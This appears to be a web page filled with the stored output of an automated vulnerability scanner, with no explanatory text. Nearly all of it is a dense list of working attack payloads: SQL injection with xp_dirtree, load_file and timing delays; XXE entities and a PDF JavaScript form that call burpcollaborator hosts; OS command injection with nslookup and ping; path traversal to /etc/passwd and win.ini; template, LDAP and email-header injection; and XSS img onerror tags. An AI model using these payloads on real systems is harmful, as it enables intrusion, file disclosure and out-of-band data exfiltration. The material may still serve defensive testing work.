XSSTEST

<?php // Show all information, defaults to INFO_ALL phpinfo(); // Show just the module information. // phpinfo(8) yields identical results. phpinfo(INFO_MODULES); ?>

XSSTEST

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

markup injection

<h1>markup injection 2</h1>

XSSTEST

(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % twzin SYSTEM "http://cgwfzcc4kz6a7oxgsedt0a43zu5otgo4rsjfd32.burpcollab'||'orator.net/">%twzin;]>'),'/l') from dual)

XSSTEST

XSSTEST'||(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % twzin SYSTEM "http://gdxjwg98h33e4sukpiaxxe17wy2sqkl8pwhjb70.burpcollab'||'orator.net/">%twzin;]>'),'/l') from dual)||'

XSSTEST

XSSTEST;declare @q varchar(99);set @q='\j7rmqj3bb6xhyvonjl40rhvaq1wvknfb61uthn5c.burpcollab'+'orator.nethef'; exec master.dbo.xp_dirtree @q;--

XSSTEST

XSSTEST';declare @q varchar(99);set @q='\x530ox1p9kvvw9m1hz2epvtoofu9i1dp4gs8f23r.burpcollab'+'orator.netmnw'; exec master.dbo.xp_dirtree @q;--

XSSTEST

XSSTEST);declare @q varchar(99);set @q='\i7qlqi3ab5xgyuomjk4zrgv9q0wukmfa62uuho5d.burpcollab'+'orator.netfcb'; exec master.dbo.xp_dirtree @q;--

XSSTEST

XSSTEST');declare @q varchar(99);set @q='\0ij310esmn8y9cz4u2fh2y6r1i7cv4qshl5ds7gw.burpcollab'+'orator.netang'; exec master.dbo.xp_dirtree @q;--

XSSTEST

XSSTEST, 1);declare @q varchar(99);set @q='\6v29e6ryztl4mica78snf4jxeoki8a3yusik5et3.burpcollab'+'orator.netwme'; exec master.dbo.xp_dirtree @q;--

XSSTEST

XSSTEST, 1, 2);declare @q varchar(99);set @q='\f6mipf27a2wdxrnjih3wqdu6pxvrjje753tvgp4e.burpcollab'+'orator.netxnw'; exec master.dbo.xp_dirtree @q;--

XSSTEST

XSSTEST, 1, 2, 3);declare @q varchar(99);set @q='\cfvfycb4jz5a6owgrectza33yu4osgn4e22upodd.burpcollab'+'orator.netpsy'; exec master.dbo.xp_dirtree @q;--

XSSTEST

XSSTEST));declare @q varchar(99);set @q='\splv8slktffqg46w1um99qdj8ae42wxkokccz6nv.burpcollab'+'orator.netfjr'; exec master.dbo.xp_dirtree @q;--

XSSTEST

XSSTEST', '1');declare @q varchar(99);set @q='\w41znw0o8juuv8l0gy1dousnnet8h0co3jrbe52u.burpcollab'+'orator.nettjq'; exec master.dbo.xp_dirtree @q;--

XSSTEST

XSSTEST', '1', '2');declare @q varchar(99);set @q='\ttqwctplxgjrk5ax5vqadrhkcbi56x1lsiga34rt.burpcollab'+'orator.netbyy'; exec master.dbo.xp_dirtree @q;--

XSSTEST

XSSTEST', '1', '2', '3');declare @q varchar(99);set @q='\ibxlui7af51g2usmnk8zvgz9u00uomjaa9y1lv9k.burpcollab'+'orator.netjfh'; exec master.dbo.xp_dirtree @q;--

XSSTEST

XSSTEST'));declare @q varchar(99);set @q='\6sz9b6oywti4ji9a48pnc4gxbohi5a0yrzfr2lqa.burpcollab'+'orator.netbol'; exec master.dbo.xp_dirtree @q;--

XSSTEST

(select load_file('\\kwknfksc07minwdo8mt1gikbf2lw9o4cvej660up.burpcollaborator.net\jmh'))

XSSTEST

XSSTEST'+(select load_file('\\ebthue76f11c2qsing8vvcz5uw0qoij6a9y1lv9k.burpcollaborator.net\bjg'))+'

XSSTEST

XSSTEST into outfile '\\k4pnnk0c87uivwlogm11oisbn2twhocc3gr8e22r.burpcollaborator.net\ddj'; --

XSSTEST

XSSTEST' into outfile '\\bwbefbs30ym9nndf8dtsg9k2ftln9f43v8j06uuj.burpcollaborator.net\pkp'; --

XSSTEST

XSSTEST'

XSSTEST

XSSTEST'

XSSTEST

XSSTEST'

XSSTEST

XSSTEST'

XSSTEST

XSSTEST'

XSSTEST

XSSTEST'

XSSTEST

XSSTEST1=

XSSTEST

XSSTEST'(select*from(select(sleep(20)))a)'

XSSTEST

XSSTEST'+(select*from(select(sleep(20)))a)+'

XSSTEST

XSSTEST' and (select*from(select(sleep(20)))a)--

XSSTEST

XSSTEST,(select*from(select(sleep(20)))a)

XSSTEST

XSSTEST'+(select*from(select(sleep(20)))a)--

XSSTEST

XSSTEST')and (select*from(select(sleep(20)))a)--

XSSTEST

XSSTEST'))and (select*from(select(sleep(20)))a)--

XSSTEST

XSSTEST' waitfor delay'0:0:20'--

XSSTEST

XSSTEST')waitfor delay'0:0:20'--

XSSTEST

XSSTEST',0)waitfor delay'0:0:20'--

XSSTEST

XSSTEST',0,0)waitfor delay'0:0:20'--

XSSTEST

XSSTEST',0,0,0)waitfor delay'0:0:20'--

XSSTEST

XSSTEST53940803' or '2093'='2093

XSSTEST

XSSTEST47722829' or '8715'='8724

XSSTEST

XSSTEST41324708' or 4750=4750--

XSSTEST

XSSTEST66296814' or 2322=2324--

XSSTEST

XSSTEST' and '4463'='4463

XSSTEST

XSSTEST' and '7857'='7858

XSSTEST

XSSTEST' and 7409=7409--

XSSTEST

XSSTEST' and 8500=8506--

XSSTEST

(select abs(1))

XSSTEST

(select sba(1))

XSSTEST

XSSTEST"

XSSTEST

aa4s4u3zlm

XSSTEST

XSSTESTdr59bny0gb

XSSTEST

u6gu6${543*695}ig13m

XSSTEST

x0yku{{717*309}}ebhph

XSSTEST

dykcp{{525|add:525}}uot07

XSSTEST

#set ($a=989*320) esjir${a}f9t0r

XSSTEST

uq538<%= 358*255 %>h61nb

XSSTEST

r5n6f = 194*834

XSSTEST

x2xio{{.}}ij8lj{{..}}s040k

XSSTEST

XSSTEST}}gjc6y'/"<yhez0

XSSTEST

XSSTEST%}g7u7n'/"<x0qz0

XSSTEST

XSSTESTgsci7%>dr2me'/"<h9jin

XSSTEST

XSSTEST%]n8kc6'/"<a4qvs

XSSTEST

XSSTESTrgu3h;//';//";//%>?>evg2f'/"<k883f

XSSTEST

XSSTEST'+sleep(20.to_i)+'

XSSTEST

XSSTEST"+sleep(20.to_i)+"

XSSTEST

XSSTEST'+eval(compile('for x in range(1):n import timen time.sleep(20)','a','single'))+'

XSSTEST

XSSTEST"+eval(compile('for x in range(1):n import timen time.sleep(20)','a','single'))+"

XSSTEST

eval(compile('for x in range(1):n import timen time.sleep(20)','a','single'))

XSSTEST

XSSTEST'.sleep(20).'

XSSTEST

XSSTEST".sleep(20)."

XSSTEST

XSSTEST{${sleep(20)}}

XSSTEST

sleep(20)

XSSTEST

5lr845hxpsb3ch29x7im539w4nahy9txlld87ww.burpcollaborator.net

XSSTEST

http://lg5ozlcdk86j7xxpsnd20j4cz35xtpode16o0cp.burpcollaborator.net/?XSSTEST

XSSTEST

Http://h6okph29a4wfxtnlij3yqfu8pzvtjle97bv3ix6m.burpcollaborator.net/?XSSTEST

XSSTEST

https://8qzb98m0uvg6hk7c2anpa6ez9qfk3cy0pohbbz0.burpcollaborator.net/?XSSTEST

XSSTEST

<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg">[removed](new(Image)).src='//v40ynv0n8iutv7lzgx1cotsmndt7hzcn4jsbf53u56burpcollaborator.net'[removed]</svg>

XSSTEST

%PDF-1.3 1 0 obj <> endobj 2 0 obj <> endobj 3 0 obj <> stream 1 0 0 -1 0 792 cm q 1 0 0 -1 0 792 cm BT 220 400 Td /F1 10 Tf (For further information please click here) Tj ET endstream endobj 4 0 obj <>>> e

XSSTEST

nslookup -q=cname 9y8ch9u12wo7plfdabvqi7m0hrnlbd61z4nwaqyf.burpcollaborator.net.&

XSSTEST

XSSTEST|nslookup -q=cname bq5e9bm3uyg9hn7f2dnsa9e29tfn3fy3urmeg25.burpcollaborator.net.&

XSSTEST

XSSTEST'"`0&nslookup -q=cname zru2aznrvmhxib8331ogbxfqahgb43zrwfo2iq7.burpcollaborator.net.&`'

XSSTEST

XSSTEST&nslookup -q=cname uusxduqmyhksl6by6wrbesildcj67y2mxapxjl8.burpcollaborator.net.&'"`0&nslookup -q=cname uusxduqmyhksl6by6wrbesildcj67y2mxapxjl8.burpcollaborator.net.&`'

XSSTEST

XSSTEST|echo qk4qhl5ean jogry03r8p||a #' |echo qk4qhl5ean jogry03r8p||a #|" |echo qk4qhl5ean jogry03r8p||a #

XSSTEST

XSSTEST&echo 2up05ke4jj 54vrp7a8q6&

XSSTEST

XSSTEST"|echo lftp844eyb uuifnv01q1 ||

XSSTEST

XSSTEST'|echo hrp5nqh1r2 yhsj14lidk #xzwx

XSSTEST

XSSTEST;echo 3h20274yfc 6l87m6sce8;

XSSTEST

XSSTEST echo duyc47kbfz k1llpsxmxm

XSSTEST

XSSTEST|ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #" |ping -n 21 127.0.0.1

XSSTEST

XSSTEST|ping -c 21 127.0.0.1||x

XSSTEST

XSSTEST&ping -n 21 127.0.0.1&

XSSTEST

XSSTEST'|ping -c 21 127.0.0.1 #

XSSTEST

XSSTEST"|ping -n 21 127.0.0.1 ||

XSSTEST

XSSTEST&ping -c 21 127.0.0.1&

XSSTEST

XSSTEST ping -c 21 127.0.0.1

XSSTEST

XSSTEST$(ping -c 21 127.0.0.1)

XSSTEST

................................windowswin.ini

XSSTEST

c:windowswin.ini

XSSTEST

../../../../../../../../../../../../../../../../windows/win.ini

XSSTEST

................................winntwin.ini

XSSTEST

../../../../../../../../../../../../../../../../winnt/win.ini

XSSTEST

windowswin.ini

XSSTEST

file:///c:/windows/win.ini

XSSTEST

........................................windowswin.ini

XSSTEST

.../..../..../..../..../..../..../..../..../..../.windows/win.ini

XSSTEST

..../..../..../..../..../..../..../..../..../..../windows/win.ini

XSSTEST

windowswin.ini

XSSTEST

....................windowswin.ini

XSSTEST

XSSTEST................................windowswin.ini

XSSTEST

XSSTEST../../../../../../../../../../../../../../../../windows/win.ini

XSSTEST

XSSTEST................................winntwin.ini

XSSTEST

XSSTEST../../../../../../../../../../../../../../../../winnt/win.ini

XSSTEST

................................windowswin.iniXSSTEST

XSSTEST

c:windowswin.iniXSSTEST

XSSTEST

................................winntwin.iniXSSTEST

XSSTEST

../../../../../../../../../../../../../../../../etc/passwd

XSSTEST

/etc/passwd

XSSTEST

file:///etc/passwd

XSSTEST

..././..././..././..././..././..././..././..././..././..././etc/passwd

XSSTEST

etcpasswd

XSSTEST

../../../../../../../../../../etc/passwd

XSSTEST

XSSTEST../../../../../../../../../../../../../../../../etc/passwd

XSSTEST

../../../../../../../../../../../../../../../../etc/passwdXSSTEST

XSSTEST

.../XSSTEST

XSSTEST

/./

XSSTEST

bhypx6tu8k)(objectClass=*

XSSTEST

cz5b24hx2t)(!(objectClass=*)

XSSTEST

)(objectClass=

XSSTEST

)(!(objectClass=)

XSSTEST

hfk

XSSTEST

XSSTEST]]>><

XSSTEST

<!DOCTYPE root PUBLIC "-//B/A/EN" "http://s92vss5kdfzq04qwlu69tqxjsay4mwhkf87v1jq.burpcollaborator.net">XSSTESTx687p

XSSTEST

<!DOCTYPE [<!ENTITY % nj9hn SYSTEM "http://npgq8nlftaflgz6r1pm49lde85ez2rxfw3oqie7.burpcollaborator.net">%nj9hn; ]>XSSTEST

XSSTEST

cgl

XSSTEST

<?xml-stylesheet type="text/xml" href="http://3786q33vbqx1yfo7j54kr1vuqlwfk7fvhj963us.burpcollaborator.net"?>XSSTEST

XSSTEST

<!DOCTYPE foo [<!ENTITY xxe583tm SYSTEM "http://mmcp5mieq9ckdy3qyoj36kad54byzqueo2gpadz.burpcollaborator.net"> ]>XSSTEST&xxe583tm;

XSSTEST

<!DOCTYPE foo [<!ENTITY xxeveqxe SYSTEM "file:///c:/windows/win.ini"> ]>XSSTEST&xxeveqxe;

XSSTEST

<!DOCTYPE foo [<!ENTITY xxelhbjp SYSTEM "file:///etc/passwd"> ]>XSSTEST&xxelhbjp;

XSSTEST

<!DOCTYPE foo [<!ENTITY xee76ilv0 "f0wh1"><!ENTITY xee76ilv1 "&xee76ilv0;&xee76ilv0;"><!ENTITY xee76ilv2 "&xee76ilv1;&xee76ilv1;">]>XSSTEST&xee76ilv2;

XSSTEST

XSSTEST"+(function(){if(typeof l7f7y==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);l7f7y=1;}}())+"

XSSTEST

XSSTEST'+(function(){if(typeof hzy96==="undefined"){var a=new Date();do{var b=new Date();}while(b-a<20000);hzy96=1;}}())+'

XSSTEST

"-->'-->`--><!--#exec cmd="nslookup -q=cname jnam6jjbr6dhev4nzlk07hba61cv0nvbn9b1yvmk.burpcolla

XSSTEST

XSSTEST BCC:user@eyghheu621ocpqfiagvvicm5hwnqbi66yzmr9lxa.burpcollaborator.net zeg: a

XSSTEST

XSSTEST> BCC:user@od5rwo9ghb3m40uspqa5xm1fw620qslgda12owcl.burpcollaborator.net plp: u

XSSTEST

user@qlft4qhipdboc22uxsi75o9h48a2yutild95wzko.burpcollaborator.net

XSSTEST

pqvab3v0xp

XSSTEST

(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?> %cqqka;]>'),'/l') from dual)

XSSTEST

XSSTEST'||(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?> %cqqka;]>'),'/l') from dual)||'

XSSTEST

XSSTEST;declare @q varchar(99);set @q='\5gm8z5cxks637hx9s7dm034wzn5ht9oxfn3fqaez.burpcollab'+'orator.netmdp'; exec master.dbo.xp_dirtree @q;--

XSSTEST

XSSTEST';declare @q varchar(99);set @q='\4467n40w8ru2vgl8g61lo2svnmtgh8cw3nrfea2z.burpcollab'+'orator.netzbt'; exec master.dbo.xp_dirtree @q;--

XSSTEST

XSSTEST);declare @q varchar(99);set @q='\p2sslpyh6csnt1jterz6mnqgl7r1ftah19p1cw0l.burpcollab'+'orator.netvzo'; exec master.dbo.xp_dirtree @q;--

XSSTEST

XSSTEST');declare @q varchar(99);set @q='\2gj5z2cukp607ex6s4dj004tzk5et6oufn3fqaez.burpcollab'+'orator.netrmh'; exec master.dbo.xp_dirtree @q;--

XSSTEST

XSSTEST, 1);declare @q varchar(99);set @q='\7iqa17ezmu859jzbu9fo256y1p7jvbqzht5lsgg5.burpcollab'+'orator.netyth'; exec master.dbo.xp_dirtree @q;--

XSSTEST

XSSTEST, 1, 2);declare @q varchar(99);set @q='\9z9ci9v13wp7qlgdbbwqj7n0irolcd71yxmp9kx9.burpcollab'+'orator.netifu'; exec master.dbo.xp_dirtree @q;--

XSSTEST

XSSTEST, 1, 2, 3);declare @q varchar(99);set @q='\6t09c6pyxtj4kiaa58qnd4hxcoii6a1yswgo3jr8.burpcollab'+'orator.netzwj'; exec master.dbo.xp_dirtree @q;--

XSSTEST

XSSTEST));declare @q varchar(99);set @q='\ehzh0ed6l17c8qyitgev1c550w6quip6g64yrtfi.burpcollab'+'orator.netayv'; exec master.dbo.xp_dirtree @q;--

XSSTEST

XSSTEST', '1');declare @q varchar(99);set @q='\ewehfes601mcnqdi8gtvgck5fwlq9i46v1jt6oud.burpcollab'+'orator.netfqa'; exec master.dbo.xp_dirtree @q;--

XSSTEST

XSSTEST', '1', '2');declare @q varchar(99);set @q='\8r0ba8n0vvh6ik8c3aopb6fzaqgk4cz0qxep1kp9.burpcollab'+'orator.netwnx'; exec master.dbo.xp_dirtree @q;--

XSSTEST

XSSTEST', '1', '2', '3');declare @q varchar(99);set @q='\s3wvmszk7ftqu4kwfu09nqrjmas4gwbk2jqbd61v.burpcollab'+'orator.netjng'; exec master.dbo.xp_dirtree @q;--

XSSTEST

XSSTEST'));declare @q varchar(99);set @q='\x0y0jxwp4kqvr9h1czxekvoojfp9d18pzqniady2.burpcollab'+'orator.netikp'; exec master.dbo.xp_dirtree @q;--

XSSTEST

(select load_file('\\9w6cf9s10wm7nldd8btqg7k0frll9d41v3jv6quf.burpcollaborator.net\jjh'))

XSSTEST

XSSTEST'+(select load_file('\\v1xykvxn5irts7izdxycltpmkdq7ez9n0qoibdz2.burpcollaborator.net\oaz'))+'

XSSTEST

XSSTEST into outfile '\\ffyiyfb7j25d6rwjrhcwzd36yx4rsjn7eb23pydn.burpcollaborator.net\npk'; --

XSSTEST

XSSTEST' into outfile '\\d4ignd0580ubvplhgf1uobs4nvtphhc53ar2ex2m.burpcollaborator.net\uzd'; --

XSSTEST

XSSTEST'

XSSTEST

XSSTEST'

XSSTEST

XSSTEST%27

XSSTEST

XSSTEST%5c%27

XSSTEST

XSSTEST'

XSSTEST

XSSTEST'

XSSTEST

XSSTEST1=

XSSTEST

XSSTEST'(select*from(select(sleep(20)))a)'

XSSTEST

XSSTEST'+(select*from(select(sleep(20)))a)+'

XSSTEST

XSSTEST' and (select*from(select(sleep(20)))a)--

XSSTEST

XSSTEST,(select*from(select(sleep(20)))a)

XSSTEST

XSSTEST'+(select*from(select(sleep(20)))a)--

XSSTEST

XSSTEST')and (select*from(select(sleep(20)))a)--

XSSTEST

XSSTEST'))and (select*from(select(sleep(20)))a)--

XSSTEST

XSSTEST' waitfor delay'0:0:20'--

XSSTEST

XSSTEST')waitfor delay'0:0:20'--

XSSTEST

XSSTEST',0)waitfor delay'0:0:20'--

XSSTEST

XSSTEST',0,0)waitfor delay'0:0:20'--

XSSTEST

XSSTEST',0,0,0)waitfor delay'0:0:20'--

XSSTEST

XSSTEST39929736' or '4544'='4544

XSSTEST

XSSTEST24603715' or '3227'='3231

XSSTEST

XSSTEST87214667' or 9873=9873--

XSSTEST

XSSTEST90394332' or 3551=3558--

XSSTEST

XSSTEST' and '4241'='4241

XSSTEST

XSSTEST' and '3328'='3329

XSSTEST

XSSTEST' and 7851=7851--

XSSTEST

(select abs(1))

XSSTEST

(select sba(1))

XSSTEST

XSSTEST"

XSSTEST

1j6htnaoq9

XSSTEST

XSSTESThd3vcq42vl

XSSTEST

db1u7${637*384}rhxyb

XSSTEST

sj8o9{{508*472}}tlxce

XSSTEST

z32ej{{795|add:558}}qjau4

XSSTEST

#set ($a=189*405) wzmww${a}niux9

XSSTEST

tlbrd<%= 798*873 %>gn3sx

XSSTEST

cgujr = 488*783

XSSTEST

wqx5w{{.}}e0h0h{{..}}a3e9s

XSSTEST

XSSTEST}}l0eup'/"

XSSTEST

XSSTEST%}nuhyz'/"

XSSTEST

XSSTESTaygnx%>v4450'/"

XSSTEST

XSSTEST%]kygm8'/"

XSSTEST

XSSTESTpwrpx;//';//";//%>?>vuher'/"

XSSTEST

XSSTEST'+sleep(20.to_i)+'

XSSTEST

XSSTEST"+sleep(20.to_i)+"

XSSTEST

XSSTEST'+eval(compile('for x in range(1):n import timen time.sleep(20)','a','single'))+'

XSSTEST

XSSTEST"+eval(compile('for x in range(1):n import timen time.sleep(20)','a','single'))+"

XSSTEST

eval(compile('for x in range(1):n import timen time.sleep(20)','a','single'))

XSSTEST

XSSTEST'.sleep(20).'

XSSTEST

XSSTEST".sleep(20)."

XSSTEST

XSSTEST{${sleep(20)}}

XSSTEST

sleep(20)

XSSTEST

ppis8plhtcfng16t1rm69ndg87e12txhp5hscg1.burpcollaborator.net

XSSTEST

http://1544o11t9ovzwdm5h32ipztsojudi5dt3hv4qsf.burpcollaborator.net/?XSSTEST

XSSTEST

Http://me4pxmaei94k5yvqqob3yk2dx43yrqmefg38q3es.burpcollaborator.net/?XSSTEST

XSSTEST

https://cq6f9cm4uzgaho7g2entaae39ufo3gy4pshfc31.burpcollaborator.net/?XSSTEST

XSSTEST

%PDF-1.3 1 0 obj </Pages/Count 1/Kids[5 0 R]>> endobj 2 0 obj </Catalog/OpenAction 9 0 R/Pages 1 0 R>> endobj 3 0 obj <112>> stream 1 0 0 -1 0 792 cm q 1 0 0 -1 0 792 cm BT 220 400 Td /F1 10 Tf (For further information please click here) Tj ET endstream endobj 4 0 obj <[/PDF/Text/ImageB/ImageC/ImageI]/Font<6 0 R>>>> endobj 5 0 obj </Page/Parent 1 0 R/MediaBox[0 0 612 792]/Contents 3 0 R/Resources 4 0 R/Annots[8 0 R]>> endobj 6 0 obj </Font/BaseFont/Helvetica/Subtype/Type1/Encoding/WinAnsiEncoding>> endobj 7 0 obj </URI/URI 10 0 R>> endobj 8 0 obj </Link/A 7 0 R/Type/Annot/Rect[0 0 889 792]/Border[0 0 0]>> endobj 9 0 obj << /S/JavaScript/JS( if(this.submitForm){ this.submitForm('http://1pr481lttofzgd6513mi9zds8jed25xtpqdi0do2.burpcollaborator.net'); app.alert("Script executed"); } ) /Next<<10 0 R/FS/URL>>/S/SubmitForm>> >> endobj 10 0 obj (http://k8tnrk4cc7yizwpokm51siwbr2xwlogc9cx4kz8o.burpcollaborator.net) endobj xref 0 11 0000000000 65536 f 0000000010 00000 n 0000000062 00000 n 0000000125 00000 n 0000000286 00000 n 0000000365 00000 n 0000000476 00000 n 0000000565 00000 n 0000000603 00000 n 0000000688 00000 n 0000000929 00000 n trailer <11/Root 2 0 R>> startxref 1017 %%EOF

XSSTEST

nslookup -q=cname rc7uvr8jge2p33tvot98wp0iv913pvkjdm1eo9cy.burpcollaborator.net.&

XSSTEST

XSSTEST|nslookup -q=cname 3im613evmq819fz7u5fk216u1l7fv7qvmje69uy.burpcollaborator.net.&

XSSTEST

XSSTEST'"`0&nslookup -q=cname kymnhkuc27oipwfoamv1iimbh2nwbo6c30vnqbf.burpcollaborator.net.&`'

XSSTEST

XSSTEST&nslookup -q=cname mi8p1meem98k9yzquof32k6d147yvqqel2dp8dx.burpcollaborator.net.&'"`0&nslookup -q=cname mi8p1meem98k9yzquof32k6d147yvqqel2dp8dx.burpcollaborator.net.&`'

XSSTEST

XSSTEST|echo qt1mf0l8d0 dqt1gxoczp||a #' |echo qt1mf0l8d0 dqt1gxoczp||a #|" |echo qt1mf0l8d0 dqt1gxoczp||a #

XSSTEST

XSSTEST&echo 4qcgzmjefy 4987h6syxb&

XSSTEST

XSSTEST"|echo duz20jm3d8 sm6p262iae ||

XSSTEST

XSSTEST'|echo ems3adfcyf mxn3fpogwt #xzwx

XSSTEST

XSSTEST;echo c7yrf4pgvo cdmdtdamg6;

XSSTEST

XSSTEST echo ml15o012iy hnrcsdrdsk

XSSTEST

XSSTEST|ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #" |ping -n 21 127.0.0.1

XSSTEST

XSSTEST|ping -c 21 127.0.0.1||x

XSSTEST

XSSTEST&ping -n 21 127.0.0.1&

XSSTEST

XSSTEST'|ping -c 21 127.0.0.1 #

XSSTEST

XSSTEST"|ping -n 21 127.0.0.1 ||

XSSTEST

XSSTEST&ping -c 21 127.0.0.1&

XSSTEST

XSSTEST ping -c 21 127.0.0.1

XSSTEST

XSSTEST$(ping -c 21 127.0.0.1)

XSSTEST

................................windowswin.ini

XSSTEST

c:windowswin.ini

XSSTEST

../../../../../../../../../../../../../../../../windows/win.ini

XSSTEST

................................winntwin.ini

XSSTEST

../../../../../../../../../../../../../../../../winnt/win.ini

XSSTEST

windowswin.ini

XSSTEST

file:///c:/windows/win.ini

XSSTEST

........................................windowswin.ini

XSSTEST

.../..../..../..../..../..../..../..../..../..../.windows/win.ini

XSSTEST

..../..../..../..../..../..../..../..../..../..../windows/win.ini

XSSTEST

windowswin.ini

XSSTEST

%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini

XSSTEST

XSSTEST................................windowswin.ini

XSSTEST

XSSTEST../../../../../../../../../../../../../../../../windows/win.ini

XSSTEST

XSSTEST................................winntwin.ini

XSSTEST

XSSTEST../../../../../../../../../../../../../../../../winnt/win.ini

XSSTEST

................................windowswin.iniXSSTEST

XSSTEST

c:windowswin.iniXSSTEST

XSSTEST

................................winntwin.iniXSSTEST

XSSTEST

../../../../../../../../../../../../../../../../etc/passwd

XSSTEST

/etc/passwd

XSSTEST

file:///etc/passwd

XSSTEST

..././..././..././..././..././..././..././..././..././..././etc/passwd

XSSTEST

etcpasswd

XSSTEST

%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd

XSSTEST

XSSTEST../../../../../../../../../../../../../../../../etc/passwd

XSSTEST

../../../../../../../../../../../../../../../../etc/passwdXSSTEST

XSSTEST

.../XSSTEST

XSSTEST

/./

XSSTEST

sztwz4aijz)(objectClass=*

XSSTEST

rvhv058t37)(!(objectClass=*)

XSSTEST

*)(objectClass=*

XSSTEST

*)(!(objectClass=*)

XSSTEST

yyn

XSSTEST

XSSTEST]]>>

XSSTEST

XSSTESTr4w60

XSSTEST

%rgzsn; ]>XSSTEST

XSSTEST

erl

XSSTEST

<?xml-stylesheet type="text/xml" href="http://ntkqcnpfxajlkzar5pq4dlhec5iz6r1f33vqqef.burpcollaborator.net"?>XSSTEST

XSSTEST

]>XSSTEST&xxeidffz;

XSSTEST

]>XSSTEST&xxevzysn;

XSSTEST

]>XSSTEST&xxe551no;

XSSTEST

]>XSSTEST&xeejt6062;

XSSTEST

XSSTEST"+(function(){if(typeof tq29v==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);tq29v=1;}}())+"

XSSTEST

XSSTEST'+(function(){if(typeof ff271==="undefined"){var a=new Date();do{var b=new Date();}while(b-a<20000);ff271=1;}}())+'

XSSTEST

"-->'-->`-->

XSSTEST

XSSTEST BCC:user@1gi4z1ctko6z7dx5s3di0z4szj5dt5otgm4er9fy.burpcollaborator.net bar: a

XSSTEST

XSSTEST> BCC:user@qket3qgiodaob21uwsh74o8h3892xusikc84vzjo.burpcollaborator.net nak: i

XSSTEST

user@f5liof1792vdwrmjhh2wpdt6oxurijd752tugp4e.burpcollaborator.net

XSSTEST

oug9kzhq54

XSSTEST

markup injection

<img src=# onerror=alert(2)/>

XSSTEST

markup injection

<img src=# onerror=alert(2)/>

XSSTEST

markup injection

<img src=# onerror=alert(2)/>

XSSTEST

markup injection

<img src=# onerror=alert(2)/>

XSSTEST

markup injection

<img src=# onerror=alert(2)/>

XSSTEST

markup injection

<img src=# onerror=alert(2)/>

XSSTEST

markup injection

<img src=# onerror=alert(2)/>

markup injection

<img src=# onerror=alert(2)/>

XSSTEST

markup injection

<img src=# onerror=alert(2)/>

XSSTEST

markup injection

<img src=# onerror=alert(2)/>

XSSTEST

markup injection

<img src=# onerror=alert(2)/>

markup injection

<img src=# onerror=alert(2)/>

XSSTEST

markup injection

<img src=# onerror=alert(2)/>

markup injection

<img src=# onerror=alert(2)/>

markup injection

<img src=# onerror=alert(2)/>

XSSTEST

markup injection

<img src=# onerror=alert(2)/>

XSSTEST

markup injection

<img src=# onerror=alert(2)/>

XSSTEST

markup injection

<img src=# onerror=alert(2)/>

markup injection

<img src=# onerror=alert(2)/>

XSSTEST

markup injection

<img src=# onerror=alert(2)/>

markup injection

<img src=# onerror=alert(2)/>

XSSTEST

markup injection

<img src=# onerror=alert(2)/>

XSSTEST

markup injection

<img src=# onerror=alert(2)/>

XSSTEST

markup injection

<img src=# onerror=alert(2)/>

markup injection

<img src=# onerror=alert(2)/>

XSSTEST

markup injection

<img src=# onerror=alert(2)/>

XSSTEST

markup injection

<img src=# onerror=alert(2)/>

markup injection

<img src=# onerror=alert(2)/>

XSSTEST

markup injection

<img src=# onerror=alert(2)/>

XSSTEST

markup injection

<img src=# onerror=alert(2)/>

